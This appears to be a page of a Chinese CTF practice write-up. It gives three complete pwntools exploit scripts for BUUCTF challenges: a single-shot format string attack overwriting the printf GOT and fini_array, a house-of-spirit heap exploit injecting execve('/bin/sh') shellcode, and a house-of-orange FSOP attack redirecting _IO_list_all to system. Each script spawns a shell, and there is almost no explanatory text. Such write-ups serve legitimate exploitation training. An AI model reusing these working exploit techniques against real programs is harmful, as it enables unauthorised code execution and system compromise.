第四页

题目12_ciscn_2019_sw_1

考点：只能一次格式化字符串
这题之后再来归纳一下格式化字符串漏洞，这题再细讲
直接贴出exp：

from pwn import *
context.arch = 'i386'
p = remote('node5.buuoj.cn',25550)
#p = process('./ciscn_2019_sw_1')
#gdb.attach(p)
pause()
fini_addr = 0x804979C
main_addr = 0x8048534
sys_addr = 0x80483D0
printf_got = 0x804989C
# 0x8534
# 0x804   0x83D0
payload = b'%'+ str(0x83d0).encode('utf-8') + b'c%14$hn'
payload += b'%'+ str(0x8534-0x83D0).encode('utf-8')+b'c%15$hn'
payload += b'%'+ str(0x82D0).encode('utf-8')+b'c%16$hnaaa'
payload += p32(printf_got)+p32(fini_addr)+p32(printf_got+2)
#payload+= b'%'+str(0x804).encode('utf-8')+b'c%14$hnaaaaaaa'
#payload+= p32(fini_addr)+p32(fini_addr+2)
#payload= fmtstr_payload(4,{printf_got : sys_addr})
#payload += b'%' + str(0x8534).encode('utf-8') +
print('len--->',len(payload))
p.sendline(payload)
#payload = fmtstr_payload(4,{})
p.sendline(b'/bin/sh\x00')
p.interactive()

题目14_lctf2016_pwn200

考点：house_of_sprirt
这题在house_of_sprirt这边有详细解答，这边就直接给exp。

from pwn import *
context(arch='amd64',log_level='debug')
p = process("./pwn200")
#p = remote(b'node5.buuoj.cn',25055)
gdb.attach(p,"b *0x400B1F\n b *0x400824\nb *0x400A5F\n b *0x40092C")
payload = b'aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaa'
pause()
p.sendafter(b'who are u?\n',payload)
p.recvuntil(b'faaaaaaa')
stack_addr = p.recvline()
print(stack_addr)
stack_addr=stack_addr[:6]
print('stack_addr------->',stack_addr)
stack_addr=int.from_bytes(stack_addr,'little')
ptr = stack_addr-0xf0+0x40
payload1 = b'48'
p.sendlineafter(b'give me your id ~~?\n',payload1)
# payload2构造fake_chunk
payload2 = p64(0x0)+p64(0x61)+b'a'*0x28+p64(ptr)
#payload2 = b'aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaa'#aaaahaaaaaaa'
p.sendafter(b'give me money~\n',payload2)
payload3 = b'2'
p.sendlineafter(b'your choice :',payload3)
payload4 = b'1'
p.sendlineafter(b'your choice :',payload4)
payload5 = b'80'
p.sendlineafter(b'how long?\n',payload5)
a = asm("""
    mov rbx,0x0068732f6e69622f
    push rbx
    mov rdi,rsp
    xor rsi,rsi
    xor rdx,rdx
    mov rax,59
    syscall
""")
sh = a
print("-------->",len(sh))
payload6 = sh +b'a'*3 + b'a'*0x18 + p64(ptr)
p.sendlineafter(b'give me more money :',payload6)
payload = b'3'
p.sendlineafter(b'your choice :',payload)
p.interactive()

题目29_houseoforange_hitcon_2016

考点：house of orange
这题也在house_of_orange中有具体分析，这边也直接贴出exp
exp如下：

from pwn import *
context.log_level = 'debug'
#p = process('')
p = remote('node5.buuoj.cn',25648)
libc = ELF('libc-2.23.so')
#libc = ELF('/home/myheart/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc.so.6')
def add(size,name,price=1,color=2):
    p.sendlineafter(b'Your choice :',b'1')
    p.sendlineafter(b'Length of name :',str(size).encode())
    p.sendafter(b'Name :',name)
    p.sendlineafter(b'Price of Orange:',str(price).encode())
    p.sendlineafter(b'Color of Orange:',str(color).encode())

def show():
    p.sendlineafter(b'Your choice :',b'2')


def edit(size,name,price=1,color=2):
    p.sendlineafter(b'Your choice :',b'3')
    p.sendlineafter(b'Length of name :',str(size).encode())
    p.sendafter(b'Name:',name)
    p.sendlineafter(b'Price of Orange:',str(price).encode())
    p.sendlineafter(b'Color of Orange:',str(color).encode())


#gdb.attach(p)
add(0x400-0x10-0x40,b'aaa',10)
payload = b'a'*0x3b8+p64(0x21)+p32(0xc)+p32(0x20)+p64(0)
payload +=p64(0)+p64(0xc01)
edit(0x500,payload,12)
add(0x1000,b'asdasd',10)
add(0x500,b'\x10',10)
show()

p.recvuntil(b'Name of house : ')
libc_x = u64(p.recvline()[:-1].ljust(8,b'\x00'))
print('libc_x--->',hex(libc_x))

libc_addr = libc_x - libc.symbols['__malloc_hook']-1520-0x10
sys_addr = libc_addr + libc.symbols['system']
# 104
io_list_all = libc_addr + libc.symbols['_IO_list_all']
main_arena =  libc_addr + libc.symbols['__malloc_hook'] +0x68
edit(0x10,b'1'*0x10,1)
show()
p.recvuntil(b'Name of house : 1111111111111111')

heap_addr = u64(p.recvline()[:-1].ljust(8,b'\x00'))
print('heap_addr--->',hex(heap_addr))

heap_dst_addr = heap_addr+1328#2608
print('io_list_all--->',hex(io_list_all))
payload = b'b'*(0x500+0x20)#+p64(0)+p64(0x21)+b'a'*0x10
payload += b'/bin/sh\x00'+p64(0x61)
payload += p64(main_arena) + p64(io_list_all-0x10)
payload += p64(0x2) + p64(0x3) # io_write_base
payload += p64(0)*9+p64(sys_addr)
payload += p64(0)*11+p64(heap_dst_addr+0x60)
#pause()
print('heap_dst_addr',hex(heap_dst_addr))
print('main_arena',hex(main_arena))
#pause()
edit(0xc00,payload,66)
pause()
p.sendlineafter(b'Your choice : ',str(1))
p.interactive()